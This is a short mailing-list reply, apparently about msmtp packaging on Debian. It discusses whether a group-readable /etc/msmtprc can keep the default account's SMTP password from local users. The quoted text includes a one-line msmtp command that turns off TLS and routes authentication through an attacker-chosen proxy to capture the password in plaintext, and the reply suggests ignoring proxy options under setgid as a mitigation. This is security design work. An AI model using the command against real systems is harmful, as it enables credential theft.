On 2019-11-05 3:30 p.m., Jakub Wilk wrote: > * Simon Deziel <[email protected]>, 2019-11-05, 10:02: >> Having /etc/msmtprc group readable is AFAIK, a "debianism". > > This is my understanding, too. > >> I don't know if upstream endorses this method of restricting access to >> the default account's password. > > I don't belive they do. > >> That said, I think it would be feasible for msmtp to obfuscate the >> AUTH line when the UID/GID do not match the EUID/EGID and the config >> file used it not world-readable. > > That wouldn't be sufficient. The attacker could run: > > $ msmtp --proxy-host=$HOST --proxy-port=$PORT --tls=off --auth=plain > [email protected] < /dev/null > > to make msmtp send unencrypted password to a proxy server of the > attacker's choice.
That's an interesting variation because it also defeat other ways of concealing the password from users (like a secret helper to decrypt it). Maybe the proxy directives provided as argument or env vars could be ignored when the UID/GID do not match the EUID/EGID. Simon
